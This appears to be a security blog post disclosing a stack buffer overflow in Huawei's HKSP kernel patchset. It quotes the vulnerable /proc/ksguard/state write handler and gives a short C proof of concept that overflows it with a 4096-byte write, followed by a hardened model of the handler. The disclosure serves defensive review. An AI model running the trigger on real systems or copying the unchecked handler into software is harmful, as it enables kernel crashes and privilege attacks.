Huawei HKSP Introduces Trivially Exploitable Vulnerability in the Linux Kernel

Category: IT Technology · Published: 4 years ago


Huawei has seemingly stepped its foot into the kernel self-protection game with the release of HKSP. The patch itself is riddled with bugs and weaknesses and generally lacks any kind of threat model (making its mitigations similar to those present in LKRG where knowledge of the mitigation in place is enough to bypass it). It is not clear if the posted patchset is an official Huawei release or whether this code is already shipping on any Huawei devices, but the patchset uses Huawei in its name, and the GitHub account for the patchset lists Huawei as the organization for the account.

Our focus today in this short blog post will be how the HKSP patchset introduced a trivially exploitable vulnerability due to a complete lack of defensive programming.

In the patch, a /proc/ksguard/state entry is created. Giving a hint to the level of review of the code, every time this entry is opened or closed, the following lines referencing a nonexistent filename are output to dmesg:

open /proc/ksg_state_proc ok.

close /proc/ksg_state_proc ok.

As we can see in the below line of the patch, the state entry is created with global RWX rights, a sign of carelessness given that the entry doesn't support any meaningful read operation and execute is meaningless on such an entry.

state_proc = proc_create("state", 0777, ksg_proc, &ksg_state_ops);

The ksg_state_write handler for writes to this entry looks like this:

static ssize_t ksg_state_write(struct file *file, const char __user *buf,
                      size_t len, loff_t *offset)
{
	u64 value;
	char tmp[32];
	size_t n = 0;

        if (copy_from_user(tmp, buf, len))
                return -1;

	value = simple_strtoul(tmp, '\0', 10);
	switch (value) {
	case 1:
		ksg_check_keyboard();
		break;
	case 2:
		ksg_check_nf();
		break;
	case 3:
		ksg_check_pointer();
		break;
	case 4:
		ksg_check_sct();
		break;
	default:
		break;
	}

        *offset += len;
        n += len;

        return len;
}

There are a number of issues with this function. First, there is the return -1 which should return a proper errno (generally -EFAULT). There is an n variable that is assigned to, but not used for anything. There are no checks at all on the value of len. The first issue this causes is acting as a limited oracle. By writing 0 bytes to the entry, the uninitialized tmp array will attempt to have a number parsed out of it and then acted upon. Likewise, writing a full 32 bytes to the entry and failing to NUL-terminate the string will cause simple_strtoul to access out of bounds, potentially operating as a partial oracle for adjacent memory. Most importantly, due to the lack of checks on len, and given that tmp is a simple 32-byte stack array, this introduces a trivially exploitable kernel stack buffer overflow able to be performed by any unprivileged user.
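The checks the handler is missing can be shown in a user-space model (an added example, not code from the HKSP patch or from the original post). It assumes memcpy() in place of copy_from_user() and strtoul() with an end-pointer check in place of the kernel's kstrtoul(); parse_state_cmd and KSG_TMP_LEN are hypothetical names, and rejecting values outside 1..4 is a choice made here, whereas the patch silently ignores them.

```c
/* Added example: user-space model of a hardened ksg_state_write().
 * memcpy() stands in for copy_from_user(); strtoul() plus an end-pointer
 * check stands in for kstrtoul(). parse_state_cmd() is a hypothetical name. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define KSG_TMP_LEN 32	/* same size as tmp[] in the patch */

/* Returns 0 and stores the command in *cmd, or a negative errno. */
static int parse_state_cmd(const char *buf, size_t len, unsigned long *cmd)
{
	char tmp[KSG_TMP_LEN];
	char *end;
	unsigned long value;

	/* Reject empty writes (never parse uninitialized stack) and any
	 * length that leaves no room for the terminating NUL. */
	if (len == 0 || len >= sizeof(tmp))
		return -EINVAL;

	memcpy(tmp, buf, len);	/* kernel: copy_from_user(), -EFAULT on failure */
	tmp[len] = '\0';	/* the parser can no longer run past tmp[] */

	errno = 0;
	value = strtoul(tmp, &end, 10);
	if (end == tmp || errno == ERANGE)
		return -EINVAL;	/* no digits, or numeric overflow */
	if (*end == '\n')	/* tolerate the newline a shell echo appends */
		end++;
	if (*end != '\0')
		return -EINVAL;	/* trailing garbage */
	if (value < 1 || value > 4)
		return -EINVAL;	/* only the four cases in the switch */

	*cmd = value;
	return 0;
}

int main(void)
{
	char big[4096] = { 0 };	/* constructed input, 4096 bytes */
	unsigned long cmd = 0;
	printf("\"3\\n\"  -> %d\n", parse_state_cmd("3\n", 2, &cmd));
	printf("empty  -> %d\n", parse_state_cmd("", 0, &cmd));
	printf("4096 B -> %d\n", parse_state_cmd(big, sizeof(big), &cmd));
	return 0;
}
```

The model covers only the length and parsing checks; the 0777 mode passed to proc_create is a separate problem.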

For completeness, a simple PoC is provided below:

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

int main(void)
{
	char buf[4096] = { };
	int fd = open("/proc/ksguard/state", O_WRONLY);
	if (fd >= 0) {
		write(fd, buf, sizeof(buf));
		close(fd);
	}
	return 0;
}

Effective security defenses require defined, realistic threat models. Defenses in the kernel should be programmed defensively and with reducing maintenance burdens in mind. The kernel can effectively be thought of as the largest, most vulnerable setuid root binary on the system. New code added to this most-privileged component of the system is potential new attack surface and requires heavy scrutiny, lest worse problems be introduced than were attempted to be solved in the first place.

